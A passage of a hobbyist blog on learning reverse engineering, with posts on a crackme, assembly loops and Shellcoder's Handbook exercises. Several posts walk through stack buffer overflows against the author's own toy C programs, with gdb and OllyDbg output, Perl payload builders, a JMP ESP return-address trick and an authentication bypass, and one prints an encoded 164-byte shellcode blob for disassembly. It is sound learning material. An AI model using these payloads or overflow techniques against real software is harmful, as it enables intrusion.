Posted by: nickfnord | January 24, 2009

My First Crackme

I wrote my first crackme this week.

it can be found here:
http://www.crackmes.de/users/nickfnord/nickfnords_keygenme_1/

here’s the description:

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
An experiment in obfuscation – by Nick Fnord
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Date: 24-Jan-2009
Program Type: Consol application
Crackme Type: KeygenMe/Analysis
Difficulty Level: I think this is a 3 or 4 but as it’s my first
crackme I’m unsure.
Programming Language: C++ with a bit of inline ASM
Platform: Only tested on WinXP but as I have included the
DLL’s statically it should run on anything that
supports the PE format.

Hi All,

This is my first crackme. I made it as an excercise in obfuscation and also
to experiment with some various anti-debugger techniques. I don’t think there
is a plug in to olly that successfully takes care of all the methods I used,
but if there is, I’d be interested to know about it.

The application will ask for a username and password, and if correct will
display a fairly well known poem.

Task One:
———
Your Primary task is to write a Keygen program for it. You are permitted to
do whatever you like to the original program.

Task Two:
———
Write a tutorial detailing how you went about making the keygen. Ideally,
Describe the program in High-level pseudo-code or in words, identifying all the
anti-debugger methods used.

Hope you have many hours of enjoyment from this one.

Cheers!
Nick (NickNOSPAM[at]nickfnord[dot]com)

That pretty much sums it up. I’m quite interested to see what other people think about it and whether they rate the program higher or lower than the 3 I gave it. Most of it was written with a glass of http://www.woodfordreserve.com/Default.aspx at hand so it’s perhaps not the most efficient bit of code I’ve made, but still :-)

I offer a free cross link on this blog to the first person to crack it :-)

enjoy!

Posted by: nickfnord | December 9, 2008

Juvenile Shellcode

hmm – was practicing writing shellcode today and…

C:\stuff\C\fun>notepad fun.asm

Section .text
global _start:
_start
mov al, 0xb

C:\stuff\C\fun>nasm fun.asm

C:\stuff\C\fun>ndisasm fun
00000000 B00B mov al,0xb

just imagine if they taught shellcode in junior high-school…

there you go – you know how they talk about those crazy people who can read hex opcodes? well, you’re one now because you’re not going to forget that mov al, 0xb is B00B.

Posted by: nickfnord | November 24, 2008

Assembly constructs (loops)

Differing constructs on different systems.

so just a quick one this time:

I’m going through the infosec institute’s reverse engineering course and one of the fundamental things that is being enphasised is the ability to quickly recognise program constructs within assembly. This allows you to quickly skim through a dissassembled program and identify the important parts that need more attention rather than struggling to manually diasassemble everything first time.

so it turns out that as is the case with most things, this is a skill that comes with much experience. as you encounter new situations you’ll learn how to better identify these sorts of things.

take for example this very simple program below – all it does is initialise an array with all nulls, but when disassembled, it comes out three different ways depending on the compiler and the system.

here’s the original program:


int main()
{
char *array[50];
int i;

for (i=0;i<50;i++)
{
array[i] = "";
}
return 0;
}

compiled with lcc and disassembled with nasm on winXP creates a Do-While loop:


000006D4 push ebp ; set up frame
000006D5 mov ebp,esp ;
000006D7 sub esp,0xcc ; allocating space (204d)
000006DD push esi ;
000006DE push edi ;
000006DF mov dword [ebp-0x4],0x0 ; setting ebp-4 to 0 (ebp-4 = counter)
000006E6 mov edi,[ebp-0x4] ; placing counter into edi
000006E9 lea esi,[dword 0x4040a0] ; loading hard-coded value into esi
000006EF mov [ebp+edi*4-0xcc],esi ; inserting said value into array[edi]
000006F6 inc dword [ebp-0x4] ; increment counter
000006F9 cmp dword [ebp-0x4],byte +0x32 ; compare counter to 50
000006FD jl 0x6e6 ; return to start of loop if less than 50
000006FF mov eax,0x0 ; set up return value
00000704 pop edi ;
00000705 pop esi ;
00000706 leave ; clean up
00000707 ret ; return.

compiled with gcc and dissassembled with gdb on redhat linux creates a While-Do loop;

main+0: push %ebp
main+1: mov %esp,%ebp
main+3: sub $0xe8,%esp
main+9: and $0xfffffff0,%esp
main+12: mov $0x0,%eax
main+17: add $0xf,%eax
main+20: add $0xf,%eax
main+23: shr $0x4,%eax
main+26: shl $0x4,%eax
main+29: sub %eax,%esp
main+31: movl $0x0,0xffffff24(%ebp) ; move 0 into ebp (ebp is counter)
main+41: cmpl $0x31,0xffffff24(%ebp) ; start of loop, compare counter to 49
main+48: jg 0x8048381 main+77 ; if it is greater, jump to the end
main+50: mov 0xffffff24(%ebp),%eax ; stick counter into eax
main+56: movl $0x8048468,0xffffff28(%ebp,%eax,4) ; move constant value into ebp + eax * 4 (array[eax])
main+67: lea 0xffffff24(%ebp),%eax ; load value of counter pointer into eax (both pointing at same thing)
main+73: incl (%eax) ; inc value pointed at by eax
main+75: jmp 0x804835d main+41 ; jump back to start
main+77: mov $0x0,%eax ; set up return value
main+82: leave ; clean up
main+83: ret ; return

gcc and gdb on backtrack3 running in a virtual machine While-Do loop but backwards…

main+0: lea 0x4(%esp),%ecx
main+4: and $0xfffffff0,%esp
main+7: pushl 0xfffffffc(%ecx)
main+10: push %ebp
main+11: mov %esp,%ebp
main+13: push %ecx
main+14: sub $0xd0,%esp
main+20: movl $0x0,0xfffffff8(%ebp) ; setting address at top of stack to 0
main+27: jmp 0x8048352 main+46 ; Jump straight to the compare
main+29: mov 0xfffffff8(%ebp),%eax ; start of loop - putting counter into eax
main+32: movl $0x8048448,0xffffff30(%ebp,%eax,4) ; move hardcoded value to array[eax]
main+43: incl 0xfffffff8(%ebp) ; increment counter at address pointed to by ebp
main+46: cmpl $0x31,0xfffffff8(%ebp) ; compare this to 49
main+50: jle 0x8048341 main+29 ; go back to start if less than or equal to
main+52; mov $0x0, %eax ; set return address
main+57: add $0xd0,%esp ; clean up
main+63: pop %ecx
main+64: pop %ebp
main+65: lea 0xfffffffc(%ecx),%esp
main+68: ret ; return

All of these are syntactically exactly the same, but are implemented in very different ways. it is important to be able to quickly recognise these structures and to not be fooled just because there’s something that is seemingly non-sensical – it’s probably the compiler just trying to do it better.

it’s all good fun anyway :-)

Posted by: nickfnord | November 13, 2008

supporting legacy code

so I’ve found that I have to do a bit of maintenance on a COBOL module at work…… I’ve been avoiding it but can’t any longer. I was actually kind of curious to see what it would be like and was kind of looking forward to it, but it seems that I was a fool.

here’s just a small snippet:

IF WH-CONDITION = "Y"
SET TRUE-CONDITION TO TRUE
ELSE
SET FALSE-CONDITION TO TRUE
END-IF.

*sigh*

Posted by: nickfnord | November 1, 2008

Overflows in Linux

My Brother bought me The Shellcoder’s Handbook as an early Christmas presant and so I’ve been going through the first few chapters over the past few days. It is quite comprehensive and to my delight I found I don’t understand everything in it – which means I’m going to learn a lot as I go through it.

The first section deals with Linux, and explains that it is doing so because of the “solid, reliable, internal operating system structures” available to work with.

So I finally bit the bullet and decided to get used to using gdb. I generally dislike using command line programs of this sort, particularly after having used wonderful applications such as IDA Pro and OllyDbg, but after dragging myself kicking and screaming through a tutorial or two, I start to like it. I was also consoled by the fact that I found the vi syntax highlighting with the backtrack3 background to be damn sexy:

The following two programs are taken from the second chapter with my own notes rather than word for word from the book. One reason being I’ve found that the book has a few technical errors in it – which, in a way, is good because it means I have to understand what’s going on, the other reason is that I’m trying to solidify it in my own mind and writing this helps.

sample program 1 (reproduced from the book):

#include <stdio.h>
#include <string.h>
void return_input(void)
{
char array[30];
gets(array);
printf(“%s\n”, array);
}
main()
{
return_input();
return 0;
}

so we compile this:

cc overflow.c -o overflow

and ignore the warning about the ‘gets’ function.

running it demonstrates that all it does is take some input and pump it out again:

bt temp # ./overflow
Hello World
Hello World
bt temp #

but what happens when we put in more than 30 characters?

bt temp # ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
Segmentation fault
bt temp #

ok so just for kicks, we want to make the program display the input twice, so we open it up in gdb:

bt temp # gdb overflow
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-slackware-linux”…
Using host libthread_db library “/lib/libthread_db.so.1″.

then we disassemble the main function:


(gdb) disas main
Dump of assembler code for function main:
0×080483aa <main+0>: lea 0×4(%esp),%ecx
0×080483ae <main+4>: and $0xfffffff0,%esp
0×080483b1 <main+7>: pushl 0xfffffffc(%ecx)
0×080483b4 <main+10>: push %ebp
0×080483b5 <main+11>: mov %esp,%ebp
0×080483b7 <main+13>: push %ecx
0×080483b8 <main+14>: sub $0×4,%esp
0×080483bb <main+17>: call 0×8048384 <return_input>
0×080483c0 <main+22>: mov $0×0,%eax
0×080483c5 <main+27>: add $0×4,%esp
0×080483c8 <main+30>: pop %ecx
0×080483c9 <main+31>: pop %ebp
0×080483ca <main+32>: lea 0xfffffffc(%ecx),%esp
0×080483cd <main+35>: ret
End of assembler dump.

and take note of the address where it is calling the return_input function (0×080483bb).

dissassembling the return_input function gives us the following:

(gdb) disas return_input
Dump of assembler code for function return_input:
0×08048384 <return_input+0>: push %ebp
0×08048385 <return_input+1>: mov %esp,%ebp
0×08048387 <return_input+3>: sub $0×28,%esp
0×0804838a <return_input+6>: sub $0xc,%esp
0×0804838d <return_input+9>: lea 0xffffffe2(%ebp),%eax
0×08048390 <return_input+12>: push %eax
0×08048391 <return_input+13>: call 0×80482b0 <gets@plt>
0×08048396 <return_input+18>: add $0×10,%esp
0×08048399 <return_input+21>: sub $0xc,%esp
0×0804839c <return_input+24>: lea 0xffffffe2(%ebp),%eax
0×0804839f <return_input+27>: push %eax
0×080483a0 <return_input+28>: call 0×80482d0 <puts@plt>
0×080483a5 <return_input+33>: add $0×10,%esp
0×080483a8 <return_input+36>: leave
0×080483a9 <return_input+37>: ret
End of assembler dump.

note the two calls – one to gets and one to puts. set a breakpoint on the gets and at the ret command at the end of the function:

(gdb) break *0×08048391
Breakpoint 1 at 0×8048391
(gdb) break *0×080483a9
Breakpoint 2 at 0×80483a9

and execute

(gdb) run
Starting program: /temp/overflow

Breakpoint 1, 0×08048391 in return_input ()

now, we look back at the dissassembly of the main function and note that the next instruction after calling return_input should be 0×080483c0.

at this point, because we are in the function return_input, the eip has been pushed to the stack. so we take a snapshot of the stack:

(gdb) x/20x $esp
0xbffff270: 0xbffff28a 0×00000000 0×00000000 0×08048310
0xbffff280: 0×00000000 0×0804958c 0xbffff298 0×0804828d
0xbffff290: 0xb7fc9ff4 0xb7fc8220 0xbffff2c8 0×080483f9
0xbffff2a0: 0xb7fc9ff4 0xbffff35c 0xbffff2b8 0×080483c0
0xbffff2b0: 0xb7ff3b90 0xbffff2d0 0xbffff328 0xb7ea1df8

and see that the eip (highlighted) is sitting there nicely, ready for us to overwrite.

hit continue:

(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD

Breakpoint 2, 0×080483a9 in return_input ()

so now we’re at the return command – lets take another look at the stack:

(gdb) x/20x $esp
0xbffff2ac: 0×44444444 0xb7004444 0xbffff2d0 0xbffff328
0xbffff2bc: 0xb7ea1df8 0xb8000ce0 0×080483e0 0xbffff328
0xbffff2cc: 0xb7ea1df8 0×00000001 0xbffff354 0xbffff35c
0xbffff2dc: 0xb8001890 0×00000000 0×00000001 0×00000001
0xbffff2ec: 0×00000000 0xb7fc9ff4 0xb8000ce0 0×00000000

you can see that the address at the top of the stack just prior to execution of the ret command is a whole bunch of D’s, 6 of them in fact, meaning that because we entered 10 in, the other four must have overwritten the EBP.

going back 4 bytes in the stack confirms it:

(gdb) x/20x 0xbffff2a8
0xbffff2a8: 0×44444444 0×44444444 0xb7004444 0xbffff2d0

and continueing again confirms the overwrite of the return address:

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0×44444444 in ?? ()

so in anycase, now we want to overwrite the EIP with the address of the return_input function to make it output twice. so we can use the printf function to send the non-printable characters to the overflow program. we want to fill up the buffer (AAAAAAAAAABBBBBBBBBBCCCCCCCCCC), overwrite the pushed ebp (DDDD) and then overwrite the return return address with the address of the return_input function.

bt temp # printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\xbb\x83\x04\x08″ | ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD»
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDÀ

Now here in The Shellcoders handbook, is an example of 1 of about 3 or so errors I’ve encountered in this chapter alone – the line in the book prints 6 D’s and not 4, causing the return address to contain 2 D’s rather than the code we passed in. don’t really know what happened to proofreading but it’s a good feeling to understand what is wrong with their examples and to be able to correct it so perhaps they put them in deliberately. (I just hope that I’m able to pick these things up as the book gets more advanced.

The book goes on to explain that we don’t necessarily always want to spawn a shell with our shellcode – sometimes exploiting the program within itself is enough. in fact it mentions that many defenses against buffer overflows are rendered useless if the atacker uses the functionality of the program to achieve their goals. – so the next example uses a buffer overflow to bypass authentication:

Here I havn’t reproduced their code at all, because I wanted to practice by myself I wrote my own program that does basically the same thing. this is based on the helloworld4 program from a previous blog.

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
int i,j;
char key[] = “NICKFNORD”;
//generate password C=p+k(mod26) and check
for(i=0,j=0;i<strlen(p);i++,j++)
{
if(j>=strlen(key))
{
j=0;
}
c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

}
}
int get_username_password()
{
char username[50];
char password[50];
char correctp[50];
int i,j;

for (i=0;i<50;i++)
{
correctp[i] = “”;
password[i] = “”;
username[i] = “”;
}

printf(“Enter Username:\n”);
fscanf(stdin,”%s”,username);
printf(“Enter Password:\n”);
fscanf(stdin,”%s”,password);
//find length of username/password, must be 8 characters
if (strlen(username) < 8 | strlen(password) < 8 )
{
printf(“invalid username/password combination”);
return 0;
}

keygen(username,correctp);

if (strcmp(correctp,password)==0)
{
return 1;
}
else
{
return 0;
}
}

int do_valid_stuff()
{
printf(“Wooo – The username and password are correct!\n exiting\n\n”);
exit (0);
}
int do_invalid_stuff()
{
printf(“Danger Danger will robinson!!!\n\n”);
exit (1);
}

int main(void)
{

if (get_username_password() )
{
do_valid_stuff();
}
else
{
do_invalid_stuff();
}
return 0;
}

and run it:

bt temp # serial
Enter Username:
AAAAAAAAAA
Enter Password:
BBBBBBBBBB
Danger Danger will robinson!!!

Awwwwww, we suck….

So the idea with this one is that we redirect the program flow to the do_valid_stuff() function. we know that there’s no validation on the input length so if we send through enough characters it will overflow.

first we find the address of the call to do_valid_stuff:

(gdb) disas main
Dump of assembler code for function main:
0×080486b0 <main+0>: lea 0×4(%esp),%ecx
0×080486b4 <main+4>: and $0xfffffff0,%esp
0×080486b7 <main+7>: pushl 0xfffffffc(%ecx)
0×080486ba <main+10>: push %ebp
0×080486bb <main+11>: mov %esp,%ebp
0×080486bd <main+13>: push %ecx
0×080486be <main+14>: sub $0×4,%esp
0×080486c1 <main+17>: call 0×804851c <get_username_password>
0×080486c6 <main+22>: test %eax,%eax
0×080486c8 <main+24>: je 0×80486d1 <main+33>
0×080486ca <main+26>: call 0×8048670 <do_valid_stuff>
0×080486cf <main+31>: jmp 0×80486d6 <main+38>
0×080486d1 <main+33>: call 0×8048690 <do_invalid_stuff>
0×080486d6 <main+38>: mov $0×0,%eax
0×080486db <main+43>: add $0×4,%esp
0×080486de <main+46>: pop %ecx
0×080486df <main+47>: pop %ebp
0×080486e0 <main+48>: lea 0xfffffffc(%ecx),%esp
0×080486e3 <main+51>: ret
End of assembler dump.

so we find we want to redirect to 0×080486ca.

then we ensure that our core will be dumped if there’s a segmentation fault:

ulimit -c unlimited

and send through a long series of characters:

bt temp # printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ” | ./serial
Enter Username:
Enter Password:
Segmentation fault (core dumped)

bt temp # gdb -q -c core
(no debugging symbols found)
Using host libthread_db library “/lib/libthread_db.so.1″.
Core was generated by `./serial’.
Program terminated with signal 11, Segmentation fault.
#0 0×45454545 in ?? ()

so we know that we can overwrite the E’s with the return address

or we could have used the debugger of course and put a break point on the return command of the get_username_password function and then dumped the stack:

0×0804866b <get_username_password+335>: mov 0xfffffffc(%ebp),%edi
0×0804866e <get_username_password+338>: leave
0×0804866f <get_username_password+339>: ret
End of assembler dump.

(gdb) break *0×0804866f
Breakpoint 1 at 0×804866f
(gdb) run
Starting program: /temp/serial
Enter Username:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Enter Password:
asdfasdfasdf

Breakpoint 1, 0×0804866f in get_username_password ()
(gdb) x/4x $esp
0xbffff31c: 0×45454545 0×46464646 0×47474747 0×48484848

demonstrating that at the return command, the last item on the stack is EEEE…

and so we modify our call to the program:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDD\xca\x86\x04\x08" | ./serial
Enter Username:
Enter Password:
Wooo - The username and password are correct!
exiting


…and so we’ve redirected the program flow and have accessed a “secure” area of the program – yay for us.

of course, this isn’t really all that impressive in the scheme of things – I just wanted to demonstrate (to myself if no one else) the use of gdb. and writing this helps solidify this in my mind.

As it says in The Shellcoders Handbook: “Now it is time to do something useful with the vulnerability you exploited earlier. Forcing overflow.c to ask for input twice instead of once is a neat trick, but hardly something you would want to tell your friends about – ” Hey, guess what, I caused a 15 line C program to ask for input twice!” No, we want you to be cooler than that.

yes, well – coolness levels increasing ever so slightly.

Posted by: nickfnord | October 30, 2008

decoding shellcode

Just a quick post – want to find out what shellcode actually does?  pump it out to a file like so:

#!/usr/local/bin/perl
$shellcode .=  #164 bytes
“\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2″.
“\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4″.
“\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8″.
“\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c”.
“\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7″.
“\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5″.
“\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a”.
“\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9″.
“\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95″.
“\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9″.
“\x87\x61\xf1\x91″;

open (FILE, “>shellcode.bin”);
print FILE “$shellcode”;
close(FILE);

then dissassemble with nasm:

ndisasm -b 32 shellcode.bin > shellcode.asm

and you’ll get a file with the assembly:

00000000  29C9              sub ecx,ecx
00000002  83E9DD            sub ecx,byte -0×23
00000005  D9EE              fldz
00000007  D97424F4          fnstenv [esp-0xc]
0000000B  5B                pop ebx
0000000C  817313CAC57A1A    xor dword [ebx+0x13],0×1a7ac5ca
00000013  83EBFC            sub ebx,byte -0×4
00000016  E2F4              loop 0xc
00000018  362D3E1ACAC5      ss sub eax,0xc5ca1a3e
0000001E  F1                int1
0000001F  5F                pop edi
00000020  F6                db 0xF6
00000021  4E                dec esi
00000022  06                push es
00000023  1F                pop ds
00000024  B2C4              mov dl,0xc4
00000026  95                xchg eax,ebp
00000027  91                xchg eax,ecx
00000028  85DD              test ebp,ebx
0000002A  F1                int1
0000002B  45                inc ebp
0000002C  EAC4915341F1F1    jmp dword 0xf1f1:0×415391c4
00000033  1B24F4            sbb esp,[esp+esi*8]
00000036  BA836641BA        mov edx,0xba416683
0000003B  6E                outsb
0000003C  CD04              int 0×4
0000003E  B017              mov al,0×17
00000040  CB                retf
00000041  07                pop es
00000042  91                xchg eax,ecx

etc.

or you can let IDA run it’s magic on the .bin file:

which provides a bit more analysis.

…contributions are welcome for the “buy Nick IDAPro” fund.

another quick note – I’ve posted a question over at the ethical hacker forums - I’ll post the results here when they come through.

Posted by: nickfnord | October 17, 2008

Buffer overflow basics part 1

I’ve become fairly distracted over the past few weeks and never ended up finishing the previous train of blogging.  Partly due to the fact that I hit a wall when trying to make a keygen program for the program in the previous blog (by extracting the relevent assembly code) and partly due to the fact that I’ve found myself easily distracted by other things such as understanding buffer overflows of varying complexity and doing things setting up a VMware environment (still havn’t got it configured properly…), setting up a web server for web app testing etc – that one was fairly straightforward thankfully. – there’s so much to learn and to do, and most of it is far more interesting than learning about breaking protection.

But mostly I found this article which sort of took the wind out of me a little bit:  http://www.ethicalhacker.net/content/view/152/2/ – absolutely brilliant – very clear and concise introduction to reversing.  It was very encouraging to see that the author took a similar approach to what I did (or the other way around) it means I’m on the right track, but his article is written with so much more background knowledge that it makes mine look pathetic :-)   So I have sort of been reluctant to post anything new really.

However, taking heart in the fact that I never promised this blog to be anything except me fumbling my way through a torrent of information, I now present:

Buffer overflow basics:

Below is the code for overflowme.c:  Sorry for the array intro there – it’s necessary for the moment to make the stack large enough for our shellcode – more detail at the end and in the next post.

#include <stdio.h>
#include <string.h>
void copyme(char *input[])
{
char name[256];

strcpy(name,input);
}

int main(int argc, char **argv)
{
char intro[] = “Hello and welcome to buffer overflow basics, this character array really does have a purpose, it will be explained later, in reallity it is a bit of a hack but it will be used to demonstrate something later on”;
printf(“%s”,intro);
copyme(argv[1]);
return 0;
}

Buffer overflows occur when data moved into a variable on the stack continues past the bounds of the variable. For example, the function copyme in the above code declares a variable “name” as an array of char with 256 elements.  When the program runs, it will allocate 256 bytes on the stack when entering the function.   The strcpy function will then copy the input from the command line into the name variable.

Let’s have a quick peak at the program in ollydbg.  You can apply command line arguments to your olly session by going to Debug->Arguments.  Alternatively, you can get Perl (download and install activePerl if you don’t have it already) to do it for you, which I have found quite a bit easier seeing as we’ll be using Perl to write shellcode later on.  the following Perl script will execute Olly (change the path to olly to suit yours of course) and attach it to the overflowme executable with and pass “hello” in as a command line parameter:

#!/usr/local/bin/perl
$buffer = "Hello";
exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

as you step through the program, you can see that the call to our copyme function is here:


0040132B   |.  E8 A4FFFFFF       CALL overflow.004012D4

the whole function looks like this:

004012D4   /$  55                PUSH EBP
004012D5   |.  89E5              MOV EBP,ESP
004012D7   |.  81EC 00010000     SUB ESP,100
004012DD   |.  57                PUSH EDI
004012DE   |.  FF75 08           PUSH [ARG.1]
004012E1   |.  8DBD 00FFFFFF     LEA EDI,[LOCAL.64]
004012E7   |.  57                PUSH EDI
004012E8   |.  E8 482E0000       CALL overflow.00404135
004012ED   |.  83C4 08           ADD ESP,8
004012F0   |.  5F                POP EDI                     ;overflow.00401330
004012F1   |.  C9                LEAVE
004012F2   \.  C3                RETN

If you pay close attention to the stack at this point, you’ll notice that as the function is called, the instruction address immediatly after the CALL command is pushed onto the stack. (in our case 00401330).  This is called the return address and it is what the program will use to return to the main part of the program after calling the function.

onto the function:

The first thing that most functions do is called the “prolog”.  It pushes EBP onto the stack and moves ESP into EBP.  Generally this means that all function parameters will be refered to as EBP+X and all local variables will be refered to as EBP-X.  The function then allocates the necessary space required for local variables by moving the stack pointer the appropriate number of bytes (100 in hex = 256bytes, the size of our name variable).

The CALL line at 004012E8 is our strcpy function.

Stepping into this section, you can see that it prepares itself for the place where it copies the input string:

00404152   |.  F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

This (as we found out in the binary analysis part II blog ) uses the register ECX as a counter and increments EDI and ESI.  at this point you can see that the ECX register is 6, which is our “Hello” string plus room a null character on the end. and we can now see that our string has been copied onto the stack:

0012FD88   6C6C6548  Hell
0012FD8C   8A43006F  o.CŠ

finishing up, the function does everything in reverse – pop’s edi and then executes the LEAVE command which does the opposite of the prolog – in this case it could be expanded to be:

ADD ESP,100
MOV ESP,EBP
POP EBP

At this point, you’ll notice that the address at the top of the stack is the return pointer that we mentioned preiously and is pointing to the 00401330 address immediately after the call to the function:


0012FE8C   00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4

We hit f8 again and the EIP now contains 00401330 and we’ve returned to the calling block.

But there is absolutely nothing stopping us passing in 257 or more characters and causing strcpy() to faithfully copy whatever we tell it to into the name array, dispite the fact the program only allocates 256 bytes.

Let’s try it:

#!/usr/local/bin/perl
$buffer = "A"x300;

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

If we run this perl script and step through the program again – we’ll come to the REP MOV copy command again and will note that the ECX register is set to 12D (or 301 bytes) which is the length of our input plus one for a null byte at the end.

So we know that this will write past the allocated space of 256 bytes – it causes our buffer to look like this:

0012FD84   00144C48  HL.
0012FD88   41414141  AAAA
0012FD8C   41414141  AAAA
0012FD90   41414141  AAAA
0012FD94   41414141  AAAA
0012FD98   41414141  AAAA
0012FD9C   41414141  AAAA
..
..
0012FE88   41414141  AAAA
0012FE8C   41414141  AAAA
0012FE90   41414141  AAAA
0012FE94   41414141  AAAA
etc.

and as we continue to step through – we get to the RETN command and find that our return address has been overwritten by “41414141″!  we step again and we get an error:

and if we pass the error to the program (shift+f9) we get:


A segmentation fault!  this means that the application tried to execute a bit of memory that it did not have permissions to access.  (this is a feature of modern processors running in Protected mode http://en.wikipedia.org/wiki/Protected_mode).

What we realise here is that the processor was trying to execute instructions contained at the address 41414141, an address that the user passed to it!

What if, instead of sending through a bunch of A’s, we could send through our own code, then cause the program to start executing it by pointing the return address into our code!  we could then cause the program to do whatever we wanted it to!

So the first thing to do is identify exactly which part of our input string overwites the return address.  mostly we do this by a series of educated guesses.   We know that the allocated buffer is 256 bytes long and we know that at the point the program subtracts the allocated space from the stack pointer, the stack looks like this:

0012FE88  /0012FF70  pÿ.
0012FE8C  |00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4
0012FE90  |00144B55  UK.  ASCII "Hello"
0012FE94  |7C910208  ‘|  ntdll.7C910208

that is, it will always have the previous stack frame pointer pushed on top of the return address – so we can take a guess that to overwrite the return address exactly, we’ll need 256 A’s to fill the buffer, 4 more to fill the space where ebp was pushed and then we can overwrite the return address.

so here’s our attempted perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;    #should overwrite the ebp address
$buffer .= "B"x4;    #should overwrite the return address with 42424242
$buffer .= "C"x100;  #if return address = 43434343 then we've padded too much

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

and it turns out:


It’s exactly where we expected it to be!  now if the allocated address space was not a multiple of 4 we would possibly have to compensate by between 1 and 4 bytes to get it exactly spot on, but in this case we don’t need to worry about it.

if we have a quick look at the process in Olly – we’ll see the stack looks something like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
0012FE8C   42424242  BBBB  ;this is our return address
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

So now we know we can overwrite the return address at will, and by doing so can cause the program to execute whatever code is at the address we point to.

So, we just need to point it to the address 0012FE90 right? that way, we can pass in some instructions instead of a whole bunch of C’s and the computer will execute it?  Yes, but the problem we face here is that this address contains a null byte (the 00).  when strcpy() encounters a null byte, it will stop copying! meaning that although we can change the address alright, we would not then be able to include code following.

in this particular program, there are two solutions to this:

We can place our code prior to the return address, (this is only possible if the allocated space is large enough for our code, but is not allways possible) or we can take note of the fact that as soon as the program flow goes to the return address, the ESP register will be pointing at the top of the stack, where our C’s start.  so what we need to do is find a memory address which does not have any null bytes in it and that has the command JMP ESP or CALL ESP.  We then replace the return address with this address and the program flow will start executing our user input.

This is where OllyUni comes in – OllyUni is an addon to Ollydbg that allows searching for certain commands in all the memory executable by the current process.  just google for it and place the .dll file in your olly directory.

Once you’ve got OllyUni in, restart ollydbg and rightclick in the execution window->overflow return address->ASCII overflow returns->JMP/CALL ESP.  depending on the speed of your computer this may take a while.

it should come back in time with a message saying it’s found some addresses:

awesome! View->Log

pick an address that does not have 00 in it. – for our purposes, we’re going for “7C86467B”

now we place that in our perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "C"x100;  #if return address = 43434343 then we've padded too much

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

Note that the address bytes are written “backwards” this is becuase they will be written in reverse order onto the stack.

now run it just for kicks…

our stack, as expected, looks like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
0012FE8C   7C86467B  {F†|  kernel32.7C86467B
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

step through the RETN command…

and we find execution has landed at:

7C86467B   - FFE4                JMP ESP

and then of course – our EIP register looks like this:

EIP 0012FE90

demonstrating that we’re about to execute our C’s.

now, we step again and we find our useless-fact-of-the-day:  the instruction “43″ in hex means INC EBX, as we see that the program is trying to execute the instructions:

Execution window:

0012FE90     43                  INC EBX
0012FE91     43                  INC EBX
0012FE92     43                  INC EBX
0012FE93     43                  INC EBX
0012FE94     43                  INC EBX
0012FE95     43                  INC EBX
0012FE96     43                  INC EBX
0012FE97     43                  INC EBX

Stack window:

0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

yay for us!

Now let’s do something a bit more useful than incrementing EBX a hundred times eh?

How about we open the calculator program calc.exe?

